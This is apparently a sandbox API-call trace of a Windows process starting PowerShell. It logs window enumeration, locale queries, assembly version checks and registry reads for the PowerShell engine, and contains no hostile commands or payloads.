	[0942.036] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa44
	[0942.036] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa64
	[0942.036] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x8a8
	[0942.036] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xaf0
	[0942.036] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x88c
	[0942.037] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb04
	[0942.037] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x910
	[0942.037] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x230
	[0942.037] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xac0
	[0942.037] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xab4
	[0942.037] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xaac
	[0942.037] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x3d0
	[0942.037] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x978
	[0942.037] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa7c
	[0942.037] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x59c
	[0942.037] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa88
	[0942.037] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa6c
	[0942.037] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa68
	[0942.038] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x9f8
	[0942.038] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa04
	[0942.038] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x924
	[0942.038] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x8dc
	[0942.038] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x7dc
	[0942.038] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x768
	[0942.038] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x764
	[0942.038] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x820
	[0942.038] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x810
	[0942.038] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x794
	[0942.038] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x83c
	[0942.038] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x7ac
	[0942.039] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb44
	[0942.039] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x6bc
	[0942.039] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb5c
	[0942.039] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x838
	[0942.039] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0942.039] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0942.039] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0942.039] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0942.039] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0942.039] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0942.039] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0942.039] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0942.040] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x818
	[0942.040] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x5b8
	[0942.040] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x494
	[0942.040] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1ec
	[0942.040] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x440
	[0942.040] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x7e8
	[0942.040] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x730
	[0942.040] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x2c8
	[0942.041] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x31c
	[0942.045] WerSetFlags () returned 0x0
	[0942.052] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0942.052] CoTaskMemFree (pv=0x0) 
	[0942.053] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x22e1a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x22e1a0 | out: pulNumLanguages=0x22e1a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x22e1a0) returned 1
	[0942.054] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x22e1a8, pwszLanguagesBuffer=0x2e4f1d8, pcchLanguagesBuffer=0x22e1a0 | out: pulNumLanguages=0x22e1a8, pwszLanguagesBuffer=0x2e4f1d8, pcchLanguagesBuffer=0x22e1a0) returned 1
	[0942.059] CoTaskMemAlloc (cb=0x24) returned 0x37a2d0
	[0942.059] GetUserDefaultLocaleName (in: lpLocaleName=0x37a2d0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0942.060] CoTaskMemFree (pv=0x37a2d0) 
	[0942.383] CoTaskMemAlloc (cb=0x104) returned 0x2e6f50
	[0942.383] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e6f50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.383] CoTaskMemFree (pv=0x2e6f50) 
	[0942.385] CoTaskMemAlloc (cb=0x104) returned 0x2e6f50
	[0942.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e6f50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.385] CoTaskMemFree (pv=0x2e6f50) 
	[0942.387] CoTaskMemAlloc (cb=0x104) returned 0x2e6f50
	[0942.387] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e6f50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.387] CoTaskMemFree (pv=0x2e6f50) 
	[0942.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.396] SetErrorMode (uMode=0x1) returned 0x1
	[0942.396] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x22de20 | out: lpFileInformation=0x22de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0942.396] SetErrorMode (uMode=0x1) returned 0x1
	[0942.397] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x22e090 | out: lpdwHandle=0x22e090) returned 0x94c
	[0942.398] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e52a68 | out: lpData=0x2e52a68) returned 1
	[0942.398] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22e008, puLen=0x22e000 | out: lplpBuffer=0x22e008*=0x2e52b04, puLen=0x22e000) returned 1
	[0942.398] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2e52be0, puLen=0x22df70) returned 1
	[0942.398] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0942.398] CoTaskMemAlloc (cb=0x2e) returned 0x375010
	[0942.398] lstrcpyW (in: lpString1=0x375010, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0942.399] CoTaskMemFree (pv=0x375010) 
	[0942.399] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2e52c34, puLen=0x22df70) returned 1
	[0942.399] lstrlenW (lpString="System.Management.Automation") returned 28
	[0942.399] CoTaskMemAlloc (cb=0x3c) returned 0x2f8fd0
	[0942.399] lstrcpyW (in: lpString1=0x2f8fd0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0942.399] CoTaskMemFree (pv=0x2f8fd0) 
	[0942.399] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2e52c90, puLen=0x22df70) returned 1
	[0942.399] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0942.399] CoTaskMemAlloc (cb=0x20) returned 0x37a330
	[0942.399] lstrcpyW (in: lpString1=0x37a330, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0942.399] CoTaskMemFree (pv=0x37a330) 
	[0942.399] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2e52cd0, puLen=0x22df70) returned 1
	[0942.399] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0942.399] CoTaskMemAlloc (cb=0x44) returned 0x2f8fd0
	[0942.399] lstrcpyW (in: lpString1=0x2f8fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0942.399] CoTaskMemFree (pv=0x2f8fd0) 
	[0942.399] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2e52d38, puLen=0x22df70) returned 1
	[0942.399] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0942.399] CoTaskMemAlloc (cb=0x76) returned 0x31f2e0
	[0942.399] lstrcpyW (in: lpString1=0x31f2e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0942.399] CoTaskMemFree (pv=0x31f2e0) 
	[0942.399] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2e52dd4, puLen=0x22df70) returned 1
	[0942.399] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0942.399] CoTaskMemAlloc (cb=0x44) returned 0x2f8fd0
	[0942.399] lstrcpyW (in: lpString1=0x2f8fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0942.399] CoTaskMemFree (pv=0x2f8fd0) 
	[0942.399] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2e52e38, puLen=0x22df70) returned 1
	[0942.399] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0942.399] CoTaskMemAlloc (cb=0x58) returned 0x2d5680
	[0942.399] lstrcpyW (in: lpString1=0x2d5680, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0942.400] CoTaskMemFree (pv=0x2d5680) 
	[0942.400] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2e52eb4, puLen=0x22df70) returned 1
	[0942.400] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0942.400] CoTaskMemAlloc (cb=0x20) returned 0x37a330
	[0942.400] lstrcpyW (in: lpString1=0x37a330, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0942.400] CoTaskMemFree (pv=0x37a330) 
	[0942.400] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2e52b5c, puLen=0x22df70) returned 1
	[0942.400] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0942.400] CoTaskMemAlloc (cb=0x66) returned 0x379050
	[0942.400] lstrcpyW (in: lpString1=0x379050, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0942.400] CoTaskMemFree (pv=0x379050) 
	[0942.400] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x0, puLen=0x22df70) returned 0
	[0942.400] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x0, puLen=0x22df70) returned 0
	[0942.400] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x0, puLen=0x22df70) returned 0
	[0942.400] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22df48, puLen=0x22df40 | out: lplpBuffer=0x22df48*=0x2e52b04, puLen=0x22df40) returned 1
	[0942.400] CoTaskMemAlloc (cb=0x204) returned 0x321c60
	[0942.400] VerLanguageNameW (in: wLang=0x0, szLang=0x321c60, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0942.400] CoTaskMemFree (pv=0x321c60) 
	[0942.400] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\", lplpBuffer=0x22df98, puLen=0x22df90 | out: lplpBuffer=0x22df98*=0x2e52a90, puLen=0x22df90) returned 1
	[0942.406] CoTaskMemAlloc (cb=0x104) returned 0x2e6f50
	[0942.406] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e6f50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.406] CoTaskMemFree (pv=0x2e6f50) 
	[0942.407] CoTaskMemAlloc (cb=0x104) returned 0x2e6f50
	[0942.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e6f50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.407] CoTaskMemFree (pv=0x2e6f50) 
	[0942.412] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22de68 | out: phkResult=0x22de68*=0x2e8) returned 0x0
	[0942.412] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x22de58 | out: phkResult=0x22de58*=0x2ec) returned 0x0
	[0942.412] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22dee8 | out: phkResult=0x22dee8*=0x2f0) returned 0x0
	[0942.414] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22de2c, lpData=0x0, lpcbData=0x22de28*=0x0 | out: lpType=0x22de2c*=0x1, lpData=0x0, lpcbData=0x22de28*=0x56) returned 0x0
	[0942.712] CoTaskMemAlloc (cb=0x5a) returned 0x378fe0
	[0942.712] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22ddfc, lpData=0x378fe0, lpcbData=0x22ddf8*=0x56 | out: lpType=0x22ddfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22ddf8*=0x56) returned 0x0
	[0942.712] CoTaskMemFree (pv=0x378fe0) 
	[0942.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.738] CoTaskMemAlloc (cb=0x104) returned 0x2e6f50
	[0942.738] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e6f50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.738] CoTaskMemFree (pv=0x2e6f50) 
	[0944.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0944.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0945.756] CoTaskMemAlloc (cb=0x104) returned 0x2d30a0
	[0945.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d30a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0945.756] CoTaskMemFree (pv=0x2d30a0) 
	[0945.759] CoTaskMemAlloc (cb=0x104) returned 0x2d30a0
	[0945.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d30a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0945.759] CoTaskMemFree (pv=0x2d30a0) 
	[0946.480] CoTaskMemAlloc (cb=0x104) returned 0x2d30a0
	[0946.480] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d30a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.480] CoTaskMemFree (pv=0x2d30a0) 
	[0946.482] CoTaskMemAlloc (cb=0x104) returned 0x2d30a0
	[0946.482] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d30a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.482] CoTaskMemFree (pv=0x2d30a0) 
	[0946.483] CoTaskMemAlloc (cb=0x104) returned 0x2d30a0
	[0946.483] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d30a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.483] CoTaskMemFree (pv=0x2d30a0) 
	[0947.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0947.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0947.723] CoTaskMemAlloc (cb=0x104) returned 0x31cc80
	[0947.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31cc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.723] CoTaskMemFree (pv=0x31cc80) 
	[0947.725] CoTaskMemAlloc (cb=0x104) returned 0x31cc80
	[0947.725] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31cc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.725] CoTaskMemFree (pv=0x31cc80) 
	[0947.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0947.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0958.710] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0958.710] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0958.710] CoTaskMemFree (pv=0x29490b0) 
	[0959.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x22db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0959.403] SetErrorMode (uMode=0x1) returned 0x1
	[0959.403] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x22ddc0 | out: lpFileInformation=0x22ddc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0959.403] SetErrorMode (uMode=0x1) returned 0x1
	[0977.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
